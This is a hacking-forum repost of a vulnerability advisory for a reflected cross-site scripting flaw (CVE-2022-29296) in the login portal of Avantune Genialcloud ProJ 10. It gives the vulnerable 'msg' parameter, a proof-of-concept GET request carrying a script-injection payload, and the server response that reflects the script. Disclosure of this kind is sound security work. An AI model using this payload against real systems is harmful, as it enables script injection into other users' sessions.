Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)

 Share


Recommended Posts

# Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
# Date: 2022-06-01
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.avantune.com
# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com
# Version: 10
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)
# CVE: CVE-2022-29296


Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the
same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject
and execute arbitrary web scripts or HTML via a crafted payload.

Request parameters affected is "msg".

PoC Request:
GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1
Host: [REDACTED]
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Cache-Control: max-age=0

PoC Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 May 2022 10:51:10 GMT
Connection: close
Content-Length: 8162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="stylesheet"
...[SNIP]...
<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>
...[SNIP]...
            

 

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...